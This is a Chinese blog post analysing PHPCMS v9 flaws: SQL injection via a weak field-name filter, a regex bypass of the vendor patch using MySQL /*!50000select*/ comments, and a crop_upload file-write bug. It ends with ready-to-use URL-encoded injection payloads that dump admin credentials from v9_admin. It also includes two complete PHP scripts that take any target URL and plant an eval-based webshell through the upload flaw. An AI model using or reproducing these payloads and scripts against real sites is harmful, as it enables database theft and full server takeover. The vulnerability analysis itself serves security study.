正在阅读:

PHPCMS v9的那些注入和getwebshell

20,618

0x00 前言

PHPCMS V9(后面简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的应用需求。 5年开发经验的优秀团队,在掌握了丰富的WEB开发经验和CMS产品开发经验的同时,勇于创新追求完美的设计理念,为全球多达10万网站提供助力,并被更多的政府机构、教育机构、事业单位、商业企业、个人站长所认可。

V9在保留2008版的特点的同时,对新版本作出重大的创新,以期待全新的PHPCMS系统服务更多的用户。(以上复制的官网简介)

新年到来的时候wooyun和t00ls上都有把phpcms v9的漏洞作为新年礼物发布出来和大家分享,我也去下载了最新的phpcms v9的程序分析了下代码,在此把一些菜鸟的心得说给大家听下,望大家指正。

0x01 新年左右的注入

1.短消息回复注入

/phpcms/modules/message/index.php
public function reply() {
if(isset($_POST['dosubmit'])) {
$messageid = intval($_POST['info']['replyid']);
//判断当前会员,是否可发,短消息.
$this->message_db->messagecheck($this->_userid);
 //检查此消息是否有权限回复 
$this->check_user($messageid,'to');
$_POST['info']['send_from_id'] = $this->_username;
$_POST['info']['message_time'] = SYS_TIME;
$_POST['info']['status'] = '1';
$_POST['info']['folder'] = 'inbox';
$_POST['info']['content'] = safe_replace($_POST['info']['content']);
$_POST['info']['subject'] = safe_replace($_POST['info']['subject']);
if(empty($_POST['info']['send_to_id'])) {
howmessage(L('user_noempty'),HTTP_REFERER);
}
$messageid = $this->message_db->insert($_POST['info'],true);//这儿数据传入                    	
if(!$messageid) return FALSE; 
showmessage(L('operation_success'),HTTP_REFERER);
} else {
$show_validator = $show_scroll = $show_header = true; 
include template('message', 'send');
}
}

上边把POST数据直接传入了insert函数

Mysql.class.php中:

public function insert($data, $table, $return_insert_id = false, $replace = false) {
if(!is_array( $data ) || $table == '' || count($data) == 0) {
    	return false;
     }
    $fielddata = array_keys($data);//这儿直接以数组下标作为字段
    $valuedata = array_values($data);
    array_walk($fielddata, array($this, 'add_special_char')); 
//到了关键地方,关键的过滤函数add_special_char                
array_walk($valuedata, array($this, 'escape_string'));
    $field = implode (',', $fielddata);
    $value = implode (',', $valuedata);
    $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
    $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
    $return = $this->execute($sql);
return $return_insert_id ? $this->insert_id() : $return;
}

漏洞函数出现了:

public function add_special_char(&$value) {
if('*' == $value || false !== strpos($value, '(') || false !== strpos($value, '.') || false !== strpos ( $value, '`')) {
//不处理包含* 或者 使用了sql方法。
} else {
$value = '`'.trim($value).'`';
}
return $value;
}

上边过滤函数没有有效过滤

2.生日修改注入

漏洞函数

/phpcms/modules/member/index.php
public function account_manage_info() {
if(isset($_POST['dosubmit'])) {
 //更新用户昵称
$nickname = isset($_POST['nickname']) && trim($_POST['nickname']) ? trim($_POST['nickname']) : '';
if($nickname) {
$this->db->update(array('nickname'=>$nickname), array('userid'=>$this->memberinfo['userid']));
 	if(!isset($cookietime)) {
 	 $get_cookietime = param::get_cookie('cookietime');
 	}
 	$_cookietime = $cookietime ? intval($cookietime) : ($get_cookietime ? $get_cookietime : 0);
 	$cookietime = $_cookietime ? TIME + $_cookietime : 0;
 	param::set_cookie('_nickname', $nickname, $cookietime);
 }
 require_once CACHE_MODEL_PATH.'member_input.class.php';
 require_once CACHE_MODEL_PATH.'member_update.class.php';
 $member_input = new member_input($this->memberinfo['modelid']);
 $modelinfo = $member_input->get($_POST['info']);//数据传入get函数,经过get函数对注入语句无影响
 $this->db->set_model($this->memberinfo['modelid']);
 $membermodelinfo = $this->db->get_one(array('userid'=>$this->memberinfo['userid']));
 if(!empty($membermodelinfo)) {
 	$this->db->update($modelinfo, array('userid'=>$this->memberinfo['userid'])); //进入sql语句形成注入
 } else {
 	$modelinfo['userid'] = $this->memberinfo['userid'];
 	$this->db->insert($modelinfo);
 }
Mysql.class.php文件
public function update($data, $table, $where = '') {
if($table == '' or $where == '') {
return false;
}
$where = ' WHERE '.$where;
$field = '';
if(is_string($data) && $data != '') {
$field = $data;
} elseif (is_array($data) && count($data) > 0) {
$fields = array();
foreach($data as $k=>$v) {
switch (substr($v, 0, 2)) {
case '+=':
$v = substr($v,2);
if (is_numeric($v)) {
$fields[] =$this->add_special_char($k).'='.$this->add_special_char($k).'+'.$this->escape_string($v, '', false);
} else {
continue;
}
break;
case '-=':
$v = substr($v,2);
if (is_numeric($v)) {
$fields[] =$this->add_special_char($k).'='.$this->add_special_char($k).'-'.$this->escape_string($v, '', false);
} else {continue;}
break;
default:
$fields[] = $this->add_special_char($k).'='.$this->escape_string($v);
}
}
$field = implode(',', $fields);
} else {
return false;
}
$sql = 'UPDATE `'.$this->config['database'].'`.`'.$table.'` SET '.$field.$where;
return $this->execute($sql);
}

可以清楚的看出又是使用的add_special_char函数过滤哦。所以其实这两个注入都是利用的程序设计的同一个bug。

0x02 绕过厂商的补丁

当让漏洞被发现者上报wooyun后厂商也做了相应的补丁,厂商也找到了漏洞的根源也就是:public function add_special_char(&$value)函数。

补丁后函数如下:

public function add_special_char(&$value) {
 if('*' == $value || false !== strpos($value, '(') || false !== strpos($value, '.') || false !== strpos ( $value, '`')) {
 //不处理包含* 或者 使用了sql方法。
 } else {
 	$value = '`'.trim($value).'`';
 }
 if (preg_match("/\b(select|insert|update|delete)\b/i", $value)) {
 	$value = preg_replace("/\b(select|insert|update|delete)\b/i", '', $value);
 }
 return $value;
 }

很明显厂商直接做了过滤:

$value = preg_replace("/\b(select|insert|update|delete)\b/i", '', $value);

看着这个可能有人会猜测selselectect是不是可以绕过呢,答案是否的。大家可以看到有个\b,这个为整词匹配,也就是说如果你是selselectect,这个为一个完整的词,用这个完整的词去匹配,不会单独拿这个词的一部分去匹配,因此经过匹配仍然是selselecctect。

那我们怎么绕过呢?

/*!50000select*/这个就是答案了,首先作为一个整词50000select是不会被正则掉的,其次使用/*!*/这个特殊的mysql的特性使得select的作用不变,完整的绕过了补丁。

从上文提到的两个注入可以看出这个过滤函数是非常重要的,如果这个过滤函数被绕过了,注入漏洞也许不止上文中的两个吧!

0x03 破不开的密码

上文提到了注入,我们也只是得到了当前的数据库操作权限(数据库权限大,可以跨库之类的就另当别论了)。

当然我们有了注入读取管理员进入后台,然后后台getwebshell这个是一般思路,但是phpcms v9的加密是加有salt的和dz加密一样,使之破解难度非常大。以前写过一个php破解脚本,单线程效率灰常低,有兴趣了可以看下。

http://lanu.sinaapp.com/PHP_study/89.html

密码破不开只能看看有没有什么前台getwebshell之类的了。

0x04 曾经的getwebshell

漏洞文件:phpcms\modules\attachment\attachments.php

漏洞函数:crop_upload

if (isset($GLOBALS["HTTP_RAW_POST_DATA"])) {
$pic = $GLOBALS["HTTP_RAW_POST_DATA"];//这里可以得知,图片内容由POST控制
//中间省略十万行
if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) {
$file = $_GET['file'];
$basename = basename($file);
if (strpos($basename, 'thumb_')!==false) {
$file_arr = explode('_', $basename);
$basename = array_pop($file_arr);
}
$new_file = 'thumb_'.$width.'_'.$height.'_'.$basename;
}

//中间省略十万行

file_put_contents($this->upload_path.$filepath.$new_file, $pic);

//上面可见,文件名$basename可控,图片内容可控,还有什么不能做??

上面这段代码是截取wooyun上的,时间太久了没有找到当时漏洞版本的程序。

网上也有相应的exp:

<?php
error_reporting(E_ERROR);
set_time_limit(0);
$pass="wooyun.in";
print_r('
+---------------------------------------------------------------------------+
PHPCms V9 GETSHELL 0DAY 
c0de by testr00ttest
针对iis6.0的漏洞 有点鸡肋 但是也可以用
apache 是老版本可能会产生问题
+---------------------------------------------------------------------------+
');
echo '密码为'.$pass;
if ($argc < 2) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url [js] 
js 类型配置  1为asp 2为php  3为apache 的版本
Example:
php '.$argv[0].' www.wooyun.in 1 
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$js=$argv[2];//写入脚本类型 wooyun.in
$phpshell='<?php @eval($_POST[\''.$pass.'\']);?>';
$aspshell='<%eval request("'.$pass.'")%>';
if($js==1){
        $file="1.asp;1.jpg";
         $ret=GetShell($url,$aspshell,$file);
}else if($js==2){
        $file="1.php;1.jpg";
        $ret=GetShell($url,$phpshell,$file);
}else if($js==3){
        $file="1.php.jpg";
        $ret=GetShell($url,$phpshell,$file);
}else{
        print_r('没有选择脚本类型');
}
$pattern = "|http:\/\/[^,]+?\.jpg,?|U";
preg_match_all($pattern, $ret, $matches);
if($matches[0][0]){
        echo "\r\nurl地址:".$matches[0][0];
}else{
        echo "\r\n没得到!";        
}
function GetShell($url,$shell,$js){
        $content =$shell;
        $data = "POST /index.php?m=attachment&c=attachments&a=crop_upload&width=1&height=1&file=http://".$url."/uploadfile/".$js." HTTP/1.1\r\n"; 
        $data .= "Host: ".$url."\r\n";
        $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
        $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
        $data .= "Connection: close\r\n";
        $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
        $data .= $content."\r\n";
        //echo $data;
        $ock=fsockopen($url,80);
        if (!$ock) {
        echo "  No response from ".$url."\n";
        }
        fwrite($ock,$data);
        $resp = '';
        while (!feof($ock)) {
               $resp.=fread($ock, 1024);
       }
       return $resp;
}
?>

可以看出基本都是利用的web容器的解析漏洞,时间过了这么久了,厂商补丁应该是打上了。

我在最新的phpcms中使用这个exp,没有成功。

0x05 补漏了apache

补丁已打,但却依然不是那么完善。

最新程序:

public function crop_upload() {
if (isset($GLOBALS["HTTP_RAW_POST_DATA"])) {
$pic = $GLOBALS["HTTP_RAW_POST_DATA"];
if (isset($_GET['width']) && !empty($_GET['width'])) {
$width = intval($_GET['width']);
}
if (isset($_GET['height']) && !empty($_GET['height'])) {
$height = intval($_GET['height']);
}
if (isset($_GET['file']) && !empty($_GET['file'])) {
$_GET['file'] = str_replace(';','',$_GET['file']);//过滤了fen号
if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键
if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) {
$file = $_GET['file'];
$basename = basename($file);//获取带有后缀的文件名
if (strpos($basename, 'thumb_')!==false) {
$file_arr = explode('_', $basename);
$basename = array_pop($file_arr);
}
$new_file = 'thumb_'.$width.'_'.$height.'_'.$basename;
} else {
pc_base::load_sys_class('attachment','',0);
$module = trim($_GET['module']);
$catid = intval($_GET['catid']);
$siteid = $this->get_siteid();
$attachment = new attachment($module, $catid, $siteid);
$uploadedfile['filename'] = basename($_GET['file']); 
$uploadedfile['fileext'] = fileext($_GET['file']);
if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) {
$uploadedfile['isimage'] = 1;
}
$file_path = $this->upload_path.date('Y/md/');
pc_base::load_sys_func('dir');
dir_create($file_path);
$new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext'];
$uploadedfile['filepath'] = date('Y/md/').$new_file;
$aid = $attachment->add($uploadedfile);
}
$filepath = date('Y/md/');
file_put_contents($this->upload_path.$filepath.$new_file, $pic);
} else {
return false;
}
echo pc_base::load_config('system', 'upload_url').$filepath.$new_file;
exit;
}
}

后缀检测:

phpcms\modules\attachment\functions\global.func.php
function is_image($file) {
$ext_arr = array('jpg','gif','png','bmp','jpeg','tiff');
$ext = fileext($file);关键地方
return in_array($ext,$ext_arr) ? $ext_arr :false;
}

关键函数:

function fileext($filename) {
return strtolower(trim(substr(strrchr($filename, '.'), 1, 10)));
}

Fileext函数是对文件后缀名的提取。

根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php

经过此函数提取到的后缀还是jpg,因此正在is_image()函数中后缀检测被绕过了。

我们回到public function crop_upload() 函数中

if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();

在经过了is_image的判断之后又来了个.php的判断,在此程序员使用的是strpos函数

这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。

经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。

最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。

看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀,大家应该明白了,它用在apache搭建的服务器上可以被解析。

0x06 Exploit编写

1.注入:

短消息回复注入:

%60userid%60%29+values%28%28/*!50000SeLECT*/+1+FROM+%28/*!50000SeLECT*/+count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28/*!50000SeLECT*/+%28/*!50000SeLECT*/+concat%280x23%2Ccast%28concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%29+as+char%29%2C0x23%29+from+v9_admin+LIMIT++0%2C1%29%29%2C1%2C62%29%29%29a+from+information_schema%2Etables+group+by+a%29b%29%29+%2D%2D+

生日修改注入:

%60userid%60%3D%28/*!50000SeLECT*/+1+FROM+%28/*!50000SeLECT*/+count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28/*!50000SeLECT*/+%28/*!50000SeLECT*/+concat%280x23%2Ccast%28concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%29+as+char%29%2C0x23%29+from+v9_admin+LIMIT++0%2C1%29%29%2C1%2C62%29%29%29a+from+information_schema%2Etables+group+by+a%29b%29+%2D%2D+

2.getshell(apache)

<?php
error_reporting(E_ERROR);
set_time_limit(0);
$pass="ln";
print_r('
+---------------------------------------------------------------------------+
PHPCms V9 GETSHELL 0DAY 
code by L.N.
apache 适用(利用的apache的解析漏洞)
+---------------------------------------------------------------------------+
');
if ($argc < 2) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url path
Example: 
1.php '.$argv[0].' lanu.sinaapp.com
2.php '.$argv[0].' lanu.sinaapp.com /phpcms
+---------------------------------------------------------------------------+
');
exit;
}
$url = $argv[1];
$path = $argv[2];
$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
if($ret=Create_dir($url,$path))
{
//echo $ret;
$pattern = "|Server:[^,]+?|U";
preg_match_all($pattern, $ret, $matches);
if($matches[0][0])
{
if(strpos($matches[0][0],'Apache') == false)
{
echo "\n亲!此网站不是apache的网站。\n";exit;
}
}
$ret = GetShell($url,$phpshell,$path,$file);
$pattern = "|http:\/\/[^,]+?\.,?|U";
preg_match_all($pattern, $ret, $matches);
if($matches[0][0])
{
echo "\n".'密码为: '.$pass."\n";
echo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
}
else
{
$pattern = "|\/uploadfile\/[^,]+?\.,?|U";
preg_match_all($pattern, $ret, $matches);
if($matches[0][0])
{
echo "\n".'密码为: '.$pass."\n";
echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
}
else
{
echo "\r\n没得到!\n";exit;
}
}
}
function GetShell($url,$shell,$path,$js)
{
    $content =$shell;
    $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n"; 
    $data .= "Host: ".$url."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    $data .= "Connection: close\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($url,80);
    if (!$ock) 
{
        echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
    }
else
{
fwrite($ock,$data);
$resp = '';
while (!feof($ock)) 
{
$resp.=fread($ock, 1024);
}
return $resp;
}
}
function Create_dir($url,$path='')
{
    $content ='I love you';
    $data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n"; 
    $data .= "Host: ".$url."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    $data .= "Connection: close\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($url,80);
    if (!$ock) 
{
        echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
    }
fwrite($ock,$data);
    $resp = '';
    while (!feof($ock)) 
{
        $resp.=fread($ock, 1024);
    }
return $resp;
}
?>

0x07 结束语

以上皆是小菜一家之言,

如有错误希望指正,

如有建议希望讨论。

原文地址:http://lanu.sinaapp.com/0day/132.html

目前有:1条访客评论

  1. M0L0K
    2015-07-18 10:52

    大赞之~~~ [/得意] 学习啦~~

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌